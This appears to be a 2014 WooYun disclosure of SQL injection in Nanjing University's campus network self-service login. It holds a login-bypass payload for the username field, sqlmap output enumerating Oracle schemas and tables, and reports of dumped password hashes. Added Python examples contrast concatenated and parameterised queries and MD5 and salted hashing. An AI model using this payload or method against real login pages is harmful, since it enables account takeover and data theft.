
Vulnerability summary

Defect ID: wooyun-2014-054788

Title: SQL injection vulnerability in the Nanjing University campus network self-service system

Vendor: Nanjing University

Author: eaglesky

Submitted: 2014-03-28 10:39

Fix time: 2014-04-02 10:40

Published: 2014-04-02 10:40

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 6

Status: Handed over to a third-party partner organization (CCERT, the education network emergency response group) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-03-28: Details sent to the vendor, awaiting vendor handling
2014-04-02: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The login page of the Nanjing University campus network self-service system has an obvious SQL injection vulnerability. The username field is not filtered at all; through it the back-end database type and the contents of every table can be dumped, with the risk of leaking a large amount of important information.

Detailed description:

http://bras.nju.edu.cn:8080/selfservice/login
The login page of the Nanjing University campus network self-service system has an obvious SQL injection vulnerability.
Entering a string such as 1' or username='b10125XXX in the username field logs in normally, exactly as if the student ID itself had been entered. Screenshot below:

[Screenshot: POC.png]


Testing the injection point with sqlmap confirms the SQL injection vulnerability. Screenshot of the program output below:

[Screenshot: Injection_Point.png]


Nanjing University's BRAS network login system has such an obvious injection vulnerability that the key information of every student user could be dumped by attackers. The Nanjing University network center is strongly advised to strengthen its security protection.
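The login bypass described above comes down to how the username reaches the SQL engine. The following is an added example, not code from the report or from the affected system: it uses an in-memory SQLite table standing in for JNAAS.USERINFO (the table name is from the report; the column names, usernames and hash strings are constructed) and shows the string-concatenation pattern beside the parameterised form. The report's own payload selects a different user's row in the first and matches nothing in the second.

```python
import sqlite3

# Constructed sample rows standing in for the JNAAS.USERINFO table named in the
# report. Usernames and hash strings are made up; the real column names are unknown.
SAMPLE_USERS = [
    ("student01", "hash-of-student01-password"),
    ("student02", "hash-of-student02-password"),
]


def build_db():
    """Create an in-memory SQLite database holding the constructed USERINFO table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERINFO (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO USERINFO VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_user_vulnerable(conn, username):
    """The pattern behind the reported bug: the username is spliced into the SQL
    text, so a quote in the input terminates the literal and the rest of the
    input becomes part of the WHERE clause."""
    sql = "SELECT username, password FROM USERINFO WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()


def lookup_user_safe(conn, username):
    """Parameterised form: the driver passes the username as a bound value, so the
    entire input is compared literally against the column and never parsed as SQL.
    (A JSP application would use java.sql.PreparedStatement the same way.)"""
    sql = "SELECT username, password FROM USERINFO WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


def compare(username):
    """Run both lookups on the same input and return which username each one finds."""
    conn = build_db()
    vulnerable = lookup_user_vulnerable(conn, username)
    safe = lookup_user_safe(conn, username)
    conn.close()
    return {
        "vulnerable": vulnerable[0] if vulnerable else None,
        "safe": safe[0] if safe else None,
    }


if __name__ == "__main__":
    # The report's payload, with a constructed username in place of the real student ID.
    print(compare("student02"))                      # both lookups: student02
    print(compare("1' or username='student01"))      # vulnerable: student01, safe: None
```

With the concatenated query the injected text rewrites the WHERE clause to `username = '1' or username='student01'`, which is why the report's author could log in as another account by typing a predicate instead of a student ID. The bound-parameter version treats the same string as a 26-character username that exists in no row, which is the behaviour a fix should produce at every query that takes user input, not only at the login page.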

Proof of vulnerability:

Running database enumeration with sqlmap returned the names of all schemas:

[15:49:43] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:49:43] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:49:43] [INFO] fetching database (schema) names
[15:49:43] [INFO] fetching number of databases
[15:49:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:49:43] [INFO] retrieved:
[15:49:44] [WARNING] reflective value(s) found and filtering out
16
[15:49:47] [INFO] retrieved: CTXSYS
[15:50:06] [INFO] retrieved: DBSNMP
[15:50:24] [INFO] retrieved: DMSYS
[15:50:39] [INFO] retrieved: EXFSYS
[15:50:57] [INFO] retrieved: JNAAS
[15:51:13] [INFO] retrieved: MDSYS
[15:51:28] [INFO] retrieved: OLAPSYS
[15:51:49] [INFO] retrieved: ORDSYS
[15:52:07] [INFO] retrieved: OUTLN
[15:52:23] [INFO] retrieved: SCOTT
[15:52:39] [INFO] retrieved: SYS
[15:52:49] [INFO] retrieved: SYSMAN
[15:53:07] [INFO] retrieved: SYSTEM
[15:53:25] [INFO] retrieved: TSMSYS
[15:53:44] [INFO] retrieved: WMSYS
[15:54:00] [INFO] retrieved: XDB
[15:54:10] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, JNAAS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB'


The JNAAS database is the current database used by the login query. Enumerating its table names gives:

[15:54:10] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, JNAAS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB'
[15:54:10] [INFO] fetching number of tables for database 'JNAAS'
[15:54:10] [INFO] retrieved: 59
[15:54:13] [INFO] retrieved: USER_OPER_LOG
[15:54:33] [INFO] retrieved: ACCESS_AREA
[15:54:50] [INFO] retrieved: ACCESS_NAS
[15:54:58] [INFO] retrieved: ACCT_01
[15:55:05] [INFO] retrieved: ACCT_02
[15:55:10] [INFO] retrieved: ACCT_03
[15:55:14] [INFO] retrieved: ACCT_04
[15:55:18] [INFO] retrieved: ACCT_05
[15:55:22] [INFO] retrieved: ACCT_06
[15:55:26] [INFO] retrieved: ACCT_07
[15:55:31] [INFO] retrieved: ACCT_08
[15:55:35] [INFO] retrieved: ACCT_09
[15:55:39] [INFO] retrieved: ACCT_10
[15:55:44] [INFO] retrieved: ACCT_11
[15:55:49] [INFO] retrieved: ACCT_12
[15:55:53] [INFO] retrieved: ACCT_ONLINE
[15:56:03] [INFO] retrieved: ADMINGROUP
[15:56:18] [INFO] retrieved: ADMINGROUPREALM
[15:56:28] [INFO] retrieved: ADMINUSER
[15:56:36] [INFO] retrieved: ADMIN_OPER_LOG
[15:56:52] [INFO] retrieved: AREA
[15:56:58] [INFO] retrieved: AUTHLOG
[15:57:08] [INFO] retrieved: BATCH_INPAYAMOUNT
[15:57:33] [INFO] retrieved: BATCH_INPAYAMOUNT_DETAIL
[15:57:48] [INFO] retrieved: BILL
[15:57:54] [INFO] retrieved: BLACKLIST
[15:58:07] [INFO] retrieved: CARD
[15:58:14] [INFO] retrieved: CARD_ACTIVE
[15:58:26] [INFO] retrieved: CLOSE_REQUEST
[15:58:44] [INFO] retrieved: ECARD
[15:58:53] [INFO] retrieved: EXT_PLAN
[15:59:04] [INFO] retrieved: INPAYAMOUNT
[15:59:21] [INFO] retrieved: MANAGE_IP
[15:59:36] [INFO] retrieved: MAX_LIMIT
[15:59:48] [INFO] retrieved: NAS
[15:59:54] [INFO] retrieved: ONLINE_DAY
[16:00:10] [INFO] retrieved: ONLINE_WEEK
[16:00:20] [INFO] retrieved: ONLINE_MONTH
[16:00:31] [INFO] retrieved: ONLINE_YEAR
[16:00:42] [INFO] retrieved: ONLINE_STATISTICS
[16:01:00] [INFO] retrieved: PLAN
[16:01:09] [INFO] retrieved: PRE_USER
[16:01:21] [INFO] retrieved: SERVICE
[16:01:32] [INFO] retrieved: SETTINGS
[16:01:44] [INFO] retrieved: TIME
[16:01:52] [INFO] retrieved: TIME_LIST
[16:02:05] [INFO] retrieved: USERGROUP
[16:02:22] [INFO] retrieved: USERINFO
[16:02:32] [INFO] retrieved: USER_APPEND
[16:02:47] [INFO] retrieved: USER_APPEND_DEFINE
[16:03:02] [INFO] retrieved: USER_APPEND_OPTIONS
[16:03:17] [INFO] retrieved: USER_MODIFY
[16:03:28] [INFO] retrieved: PLUGINS_NOTICE
[16:03:49] [INFO] retrieved: PLUGINS_FC_IP_LIST
[16:04:07] [INFO] retrieved: NOTICE
[16:04:17] [INFO] retrieved: PLUGINS_BZ
[16:04:35] [INFO] retrieved: PLUGINS_FC_STATIC_IP_LIST
[16:05:09] [INFO] retrieved: PLUGINS_FC_ONLINE
[16:05:22] [INFO] retrieved: PLUGINS_OA_USERINFO


The USERINFO table is the one that records all information about students' network accounts. The injection point runs with very high privileges, and the password hash for any given student ID can be selected at will:

[Screenshot: Password_Hash.png]


The ADMINUSER table also records all administrator information. The passwords in it are all MD5 hashes, but because the passwords are too simple most of them can be brute-forced. Screenshot below:

[Screenshot: ADMINUSER.png]
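The ADMINUSER finding above is a storage problem as much as a password-strength problem: an unsalted MD5 of a simple password is deterministic and cheap to compute, so one precomputed table covers every account. The following is an added example, not the system's own code, contrasting that scheme with PBKDF2-HMAC-SHA256 plus a per-record random salt from the Python standard library. The record format and the iteration count are this example's own choices.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256. Kept modest so the example runs quickly;
# OWASP's current guidance for this construction is 600,000 iterations.
ITERATIONS = 100_000


def md5_store(password):
    """Unsalted MD5, the scheme the report found in ADMINUSER. The output depends
    only on the password, so equal passwords share a hash and a lookup table
    built once serves against every account at once."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_store(password, salt=None):
    """Salted, iterated hash. A fresh 16-byte random salt per record means two
    administrators with the same password get different stored values, and the
    iteration count makes each guess cost far more than one MD5 call."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Self-describing record: algorithm, work factor, salt and digest (hex).
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def pbkdf2_verify(password, stored):
    """Recompute from the parameters carried in the record and compare in constant
    time. The record's own iteration count is honoured, so records written before
    ITERATIONS was raised still verify."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        rounds = int(iterations)
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_password_collides(scheme, password):
    """True when storing the same password twice yields identical records."""
    return scheme(password) == scheme(password)


if __name__ == "__main__":
    pw = "123456"  # constructed weak password of the kind the report describes
    print(md5_store(pw))
    print(same_password_collides(md5_store, pw))     # True
    print(same_password_collides(pbkdf2_store, pw))  # False
    rec = pbkdf2_store(pw)
    print(pbkdf2_verify(pw, rec), pbkdf2_verify("wrong", rec))  # True False
```

Salting removes the shared-table shortcut, and the iteration count slows every guess, but neither substitutes for rejecting trivially guessable administrator passwords at the point where they are set; the report's observation that most ADMINUSER hashes fell to brute force is ultimately a password-policy finding as well.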

Remediation:

The Nanjing University network center is urged to patch the vulnerability as soon as possible to avoid unnecessary information leakage.

Copyright notice: when reposting, credit the source as eaglesky@WooYun


Vendor response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2014-04-02 10:40

Vendor reply:

Latest status:

None yet